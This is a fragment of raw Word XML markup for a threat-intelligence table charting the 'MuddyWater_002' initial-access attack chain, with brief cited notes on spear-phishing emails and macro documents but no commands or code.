              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FF908E3" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="008C6A37">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">From January 2018 to March 2018, we observed attackers leveraging the latest code execution and persistence techniques </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00B857D7" w14:paraId="71142F71" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59A59C7F" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41718BBA" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C0A455F" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E6CEB67" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00AC7A85" w:rsidRDefault="00345E09" w:rsidP="00345E09"/>
    <w:p w14:paraId="238F90E2" w14:textId="16D385CE" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00345E09">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access</w:t>
      </w:r>
      <w:r w:rsidR="001A5FC1">
        <w:t xml:space="preserve"> – Install approach two</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D67BFA" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00345E09"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="440"/>
        <w:gridCol w:w="1893"/>
        <w:gridCol w:w="2910"/>
        <w:gridCol w:w="661"/>
        <w:gridCol w:w="699"/>
        <w:gridCol w:w="557"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="2164"/>
      </w:tblGrid>
      <w:tr w:rsidR="00345E09" w:rsidRPr="002D1D50" w14:paraId="41CE5DCA" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="745EE788" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="77E531B5" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2910" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2EB0DCC6" w14:textId="3A8928F2" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>MuddyWater_002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="521260AF" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="261401BA" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6893027A" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6AD2EE37" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3909A366" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="002D1D50" w14:paraId="637CBA36" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24F0F124" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A5FB4FD" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54AF2F9E" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FC294D7" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46D4F125" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7233E7A3" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C4A5831" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B2632EE" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="002D1D50" w14:paraId="63AC16E3" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43009D15" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="099704F3" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01A59B59" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49455A3B" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04A36C6B" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C8301CB" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18E86FB6" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28125DFA" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB7974" w:rsidRPr="00B857D7" w14:paraId="53A4867A" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BF6DEDA" w14:textId="77777777" w:rsidR="00DB7974" w:rsidRPr="00B857D7" w:rsidRDefault="00DB7974" w:rsidP="00DB7974">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28D0299D" w14:textId="77777777" w:rsidR="00DB7974" w:rsidRPr="00B857D7" w:rsidRDefault="00DB7974" w:rsidP="00DB7974">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910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54D92C66" w14:textId="77777777" w:rsidR="00DB7974" w:rsidRPr="00B857D7" w:rsidRDefault="00DB7974" w:rsidP="00DB7974">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1" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A892005" w14:textId="3194EBD0" w:rsidR="00DB7974" w:rsidRPr="00B857D7" w:rsidRDefault="00DB7974" w:rsidP="00DB7974">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="699E26EC" w14:textId="77777777" w:rsidR="00DB7974" w:rsidRPr="00B857D7" w:rsidRDefault="00DB7974" w:rsidP="00DB7974">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73481408" w14:textId="77777777" w:rsidR="00DB7974" w:rsidRPr="00B857D7" w:rsidRDefault="00DB7974" w:rsidP="00DB7974">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F35711E" w14:textId="34AEEA30" w:rsidR="00DB7974" w:rsidRPr="00B857D7" w:rsidRDefault="00DB7974" w:rsidP="00DB7974">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30414944" w14:textId="77777777" w:rsidR="00DB7974" w:rsidRPr="00B857D7" w:rsidRDefault="00DB7974" w:rsidP="00DB7974">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A0702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="006451C7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>The spear phishing emails and attached malicious macro documents typically have geopolitical themes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB7974" w:rsidRPr="00B857D7" w14:paraId="0E084E07" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69C7C8D0" w14:textId="77777777" w:rsidR="00DB7974" w:rsidRPr="00B857D7" w:rsidRDefault="00DB7974" w:rsidP="00DB7974">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="306FD33E" w14:textId="77777777" w:rsidR="00DB7974" w:rsidRPr="00B857D7" w:rsidRDefault="00DB7974" w:rsidP="00DB7974">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910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D07B8C8" w14:textId="77777777" w:rsidR="00DB7974" w:rsidRPr="00B857D7" w:rsidRDefault="00DB7974" w:rsidP="00DB7974">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1" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C48A088" w14:textId="77777777" w:rsidR="00DB7974" w:rsidRPr="00B857D7" w:rsidRDefault="00DB7974" w:rsidP="00DB7974">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49434D02" w14:textId="77777777" w:rsidR="00DB7974" w:rsidRPr="00B857D7" w:rsidRDefault="00DB7974" w:rsidP="00DB7974">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35EE2A22" w14:textId="77777777" w:rsidR="00DB7974" w:rsidRPr="00B857D7" w:rsidRDefault="00DB7974" w:rsidP="00DB7974">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CD31D1E" w14:textId="355B0D47" w:rsidR="00DB7974" w:rsidRPr="00B857D7" w:rsidRDefault="00DB7974" w:rsidP="00DB7974">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A10B54F" w14:textId="77777777" w:rsidR="00DB7974" w:rsidRPr="00B857D7" w:rsidRDefault="00DB7974" w:rsidP="00DB7974">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
